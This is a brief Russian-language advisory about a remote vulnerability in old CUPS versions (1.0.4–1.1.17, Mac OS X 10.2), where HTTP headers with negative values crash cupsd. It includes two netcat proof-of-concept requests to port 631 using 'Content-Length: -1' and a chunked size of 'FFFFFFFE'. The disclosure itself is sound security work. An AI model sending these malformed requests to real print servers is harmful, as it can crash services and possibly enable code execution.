Cups (Common Unix Printing System) — свободно доступный пакет для управления принтером от Cups Project для Unix и Linux платформ. 

Обнаруженная в CUPS уязвимость позволяет удаленному атакующему выполнять произвольный код на уязвимой системе. Нападающий может эксплуатировать эту уязвимость соединяясь с уязвимой системой и передавая уродливые HTTP заголовки с отрицательным значением для некоторых полей. Когда cupsd получит этот запрос, его работа аварийно завершится. Пример: 

$ nc -v localhost 631 
localhost [127.0.0.1] 631 (?) open 
POST /printers HTTP/1.1 
Host: localhost 
Authorization: Basic AAA 
Content-Length: -1 

$ nc -v localhost 631 
localhost [127.0.0.1] 631 (?) open 
POST /printers HTTP/1.1 
Host: localhost 
Authorization: Basic AAA 
Transfer-Encoding: chunked 

— — — — -FFFFFFFE 

Уязвимость обнаружена в Easy Software Products CUPS 1.0.4-1.1.17 Apple MacOS X 10.2-10.2.2.



Оставить мнение